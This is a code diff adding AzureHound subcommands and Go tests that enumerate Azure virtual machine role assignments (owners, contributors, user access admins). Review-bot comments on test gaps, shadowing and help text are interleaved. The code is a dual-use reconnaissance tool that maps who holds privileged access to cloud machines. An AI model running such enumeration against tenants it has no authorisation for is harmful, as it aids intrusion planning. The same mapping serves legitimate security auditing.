+ subscriptions := listSubscriptions(ctx, azClient)
+ vms := listVirtualMachines(ctx, azClient, subscriptions)
+ vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listVirtualMachineContributors(ctx, vmRoleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listVirtualMachineContributors(
+ ctx context.Context,
+ roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.ContributorRoleID))
+ contributors := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineContributor {
+ return models.VirtualMachineContributor{
+ VirtualMachineId: ra.VirtualMachineId,
+ Contributor: ra.RoleAssignment,
+ }
+ })
+ return NewAzureWrapper(enums.KindAZVMContributor, models.VirtualMachineContributors{
+ VirtualMachineId: ra.Data.VirtualMachineId,
+ Contributors: contributors,
+ })
+ })
+}
diff --git a/cmd/list-virtual-machine-contributors_test.go b/cmd/list-virtual-machine-contributors_test.go
new file mode 100644
index 0000000..3b13458
--- /dev/null
+++ b/cmd/list-virtual-machine-contributors_test.go
@@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineContributors(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineContributors(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.ContributorRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: 
constants.ContributorRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machine-owners.go b/cmd/list-virtual-machine-owners.go new file mode 100644 index 0000000..62edcf3 --- /dev/null +++ b/cmd/list-virtual-machine-owners.go 
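Review bot: This test passes whether or not the role filter works, because it only checks that one value arrives on `channel`, and the mapping callback in `listVirtualMachineContributors` returns a wrapper even when the filtered list is empty. Assert on the payload instead: type-assert the received value and check that its `Contributors` slice has exactly one entry, and add a second fixture assignment with a different `RoleDefinitionId` so that a filter letting everything through also fails. `mockClient` and its `TenantInfo` expectation are never handed to the function under test and can be dropped. The owners, user-access-admins and vmcontributors tests in this patch have the same shape; the matching rule of `vmRoleAssignmentFilter` is defined outside this hunk.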
@@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineOwnersCmd) +} + +var listVirtualMachineOwnersCmd = &cobra.Command{ + Use: "virtual-machine-owners", + Long: "Lists Azure Virtual Machine Owners", + Run: listVirtualMachineOwnersCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine owners...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := 
listVirtualMachineOwners(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineOwners( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.OwnerRoleID)) + owners := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineOwner { + return models.VirtualMachineOwner{ + VirtualMachineId: ra.VirtualMachineId, + Owner: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMOwner, models.VirtualMachineOwners{ + VirtualMachineId: ra.Data.VirtualMachineId, + Owners: owners, + }) + }) +} diff --git a/cmd/list-virtual-machine-owners_test.go b/cmd/list-virtual-machine-owners_test.go new file mode 100644 index 0000000..d4a403e --- /dev/null +++ b/cmd/list-virtual-machine-owners_test.go 
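Review bot: In `listVirtualMachineOwners` the inner callback parameter `ra models.VirtualMachineRoleAssignment` shadows the outer `ra azureWrapper[models.VirtualMachineRoleAssignments]`, so `ra.VirtualMachineId` and `ra.Data.VirtualMachineId` a few lines apart read from different values under one name. Renaming the outer parameter, e.g. `func(wrapped azureWrapper[models.VirtualMachineRoleAssignments]) any` with `wrapped.Data.RoleAssignments` and `wrapped.Data.VirtualMachineId`, removes the ambiguity. A doc comment such as `// listVirtualMachineOwners keeps only the role assignments matching constants.OwnerRoleID for each virtual machine.` would state the contract. The contributors, user-access-admins and vmcontributors files in this patch share the pattern.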
@@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineOwners(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.OwnerRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: 
constants.OwnerRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machine-role-assignments.go b/cmd/list-virtual-machine-role-assignments.go new file mode 100644 index 0000000..1057283 --- /dev/null +++ b/cmd/list-virtual-machine-role-assignments.go 
@@ -0,0 +1,129 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineRoleAssignmentsCmd) +} + +var listVirtualMachineRoleAssignmentsCmd = &cobra.Command{ + Use: "virtual-machine-role-assignments", + Long: "Lists Virtual Machine Role Assignments", + Run: listVirtualMachineRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listVirtualMachineRoleAssignments(ctx, azClient, listVirtualMachines(ctx, azClient, subscriptions)) + 
panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineRoleAssignments(ctx context.Context, client client.AzureClient, virtualMachines <-chan interface{}) <-chan azureWrapper[models.VirtualMachineRoleAssignments] { + var ( + out = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), virtualMachines) { + if virtualMachine, ok := result.(AzureWrapper).Data.(models.VirtualMachine); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating virtual machine role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, virtualMachine.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + virtualMachineRoleAssignments = models.VirtualMachineRoleAssignments{ + VirtualMachineId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this virtual machine", "virtualMachineId", id) + } else { + virtualMachineRoleAssignment := models.VirtualMachineRoleAssignment{ + VirtualMachineId: id, + RoleAssignment: item.Ok, + } + log.V(2).Info("found virtual machine role assignment", "virtualMachineRoleAssignment", virtualMachineRoleAssignment) + count++ + virtualMachineRoleAssignments.RoleAssignments = append(virtualMachineRoleAssignments.RoleAssignments, virtualMachineRoleAssignment) + } + } + if ok := 
pipeline.Send(ctx.Done(), out, NewAzureWrapper(enums.KindAZVMRoleAssignment, virtualMachineRoleAssignments)); !ok { + return + } + log.V(1).Info("finished listing virtual machine role assignments", "virtualMachineId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all virtual machine role assignments") + }() + + return out +} diff --git a/cmd/list-virtual-machine-role-assignments_test.go b/cmd/list-virtual-machine-role-assignments_test.go new file mode 100644 index 0000000..efd5112 --- /dev/null +++ b/cmd/list-virtual-machine-role-assignments_test.go 
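Review bot: When `ListRoleAssignmentsForResource` yields `item.Error`, the loop logs "unable to continue processing role assignments" but keeps ranging and then sends the partially filled `virtualMachineRoleAssignments` downstream with nothing marking it incomplete. A consumer of the output therefore cannot tell a virtual machine that has few role assignments from one whose enumeration failed part-way, which matters when the data is used to judge who can reach a machine. I would record the failure and surface it: `failed = false` beside `count` in the `var` block, `failed = true` in the error branch, and `"incomplete", failed` appended to the "finished listing virtual machine role assignments" log call. The per-subscription loop in list-virtual-machines.go treats `item.Error` the same way.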
@@ -0,0 +1,106 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVirtualMachinesChannel := make(chan interface{}) + mockVirtualMachineRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment]) + mockVirtualMachineRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockVirtualMachineRoleAssignmentChannel).Times(1) + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), 
gomock.Any()).Return(mockVirtualMachineRoleAssignmentChannel2).Times(1) + channel := listVirtualMachineRoleAssignments(ctx, mockClient, mockVirtualMachinesChannel) + + go func() { + defer close(mockVirtualMachinesChannel) + mockVirtualMachinesChannel <- AzureWrapper{ + Data: models.VirtualMachine{}, + } + mockVirtualMachinesChannel <- AzureWrapper{ + Data: models.VirtualMachine{}, + } + }() + go func() { + defer close(mockVirtualMachineRoleAssignmentChannel) + mockVirtualMachineRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.VirtualMachineContributorRoleID, + }, + }, + } + mockVirtualMachineRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.AvereContributorRoleID, + }, + }, + } + }() + go func() { + defer close(mockVirtualMachineRoleAssignmentChannel2) + mockVirtualMachineRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.VirtualMachineAdministratorLoginRoleID, + }, + }, + } + mockVirtualMachineRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 2 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 1 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } +} diff --git a/cmd/list-virtual-machine-user-access-admins.go b/cmd/list-virtual-machine-user-access-admins.go new file mode 100644 index 0000000..7b37c59 --- /dev/null 
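Review bot: The second assertion compares `len(result.Data.RoleAssignments)` with 1 but reports `want 2`, so a failure prints a misleading expectation; the call should be `t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 1)`. The assumed order (two assignments first, then one) also looks scheduling-dependent, since the two virtual machines are fanned out over `config.ColStreamCount` streams and each result is sent when its own stream finishes. Collecting both lengths and comparing them without regard to order would make the test stable.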
+++ b/cmd/list-virtual-machine-user-access-admins.go 
@@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineUserAccessAdminsCmd) +} + +var listVirtualMachineUserAccessAdminsCmd = &cobra.Command{ + Use: "virtual-machine-user-access-admins", + Long: "Lists Azure Virtual Machine User Access Admins", + Run: listVirtualMachineUserAccessAdminsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine user access admins...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, 
azClient, vms) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listVirtualMachineUserAccessAdmins(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineUserAccessAdmins( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.UserAccessAdminRoleID)) + uaas := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineUserAccessAdmin { + return models.VirtualMachineUserAccessAdmin{ + VirtualMachineId: ra.VirtualMachineId, + UserAccessAdmin: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMUserAccessAdmin, models.VirtualMachineUserAccessAdmins{ + VirtualMachineId: ra.Data.VirtualMachineId, + UserAccessAdmins: uaas, + }) + }) +} diff --git a/cmd/list-virtual-machine-user-access-admins_test.go b/cmd/list-virtual-machine-user-access-admins_test.go new file mode 100644 index 0000000..8dd7ff2 --- /dev/null +++ b/cmd/list-virtual-machine-user-access-admins_test.go 
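Review bot: `listVirtualMachineUserAccessAdminsCmd` sets only `Long`, so the parent command's help listing shows this subcommand with an empty description, because cobra fills that column from `Short`. Adding `Short: "Lists Azure Virtual Machine User Access Admins",` to the struct literal fixes the listing. The other commands added in this patch are declared the same way.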
@@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineUserAccessAdmins(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineUserAccessAdmins(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.UserAccessAdminRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + 
RoleDefinitionId: constants.UserAccessAdminRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machine-vmcontributors.go b/cmd/list-virtual-machine-vmcontributors.go new file mode 100644 index 0000000..b89e04f --- /dev/null +++ b/cmd/list-virtual-machine-vmcontributors.go 
@@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineVMContributorsCmd) +} + +var listVirtualMachineVMContributorsCmd = &cobra.Command{ + Use: "virtual-machine-vmcontributors", + Long: "Lists Azure Virtual Machine VMContributors", + Run: listVirtualMachineVMContributorsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineVMContributorsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine vmcontributors...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms) + 
panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listVirtualMachineVMContributors(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineVMContributors( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.VirtualMachineContributorRoleID)) + vmContributors := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineVMContributor { + return models.VirtualMachineVMContributor{ + VirtualMachineId: ra.VirtualMachineId, + VMContributor: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMVMContributor, models.VirtualMachineVMContributors{ + VirtualMachineId: ra.Data.VirtualMachineId, + VMContributors: vmContributors, + }) + }) +} diff --git a/cmd/list-virtual-machine-vmcontributors_test.go b/cmd/list-virtual-machine-vmcontributors_test.go new file mode 100644 index 0000000..8075d29 --- /dev/null +++ b/cmd/list-virtual-machine-vmcontributors_test.go 
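Review bot: The help text "Lists Azure Virtual Machine VMContributors" does not say how this command differs from `virtual-machine-contributors`; the code shows the difference is the role being filtered, `constants.VirtualMachineContributorRoleID` here versus `constants.ContributorRoleID` in the other file. I would spell the role out, e.g. `Long: "Lists principals holding the Virtual Machine Contributor role on Azure Virtual Machines",`, and add a doc comment on `listVirtualMachineVMContributors` naming the constant it filters on. Anyone reading the collected output needs that distinction to interpret the two result kinds correctly.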
@@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineVMContributors(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineVMContributors(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.VirtualMachineContributorRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + 
RoleDefinitionId: constants.VirtualMachineContributorRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machines.go b/cmd/list-virtual-machines.go new file mode 100644 index 0000000..c0cc6ef --- /dev/null +++ b/cmd/list-virtual-machines.go 
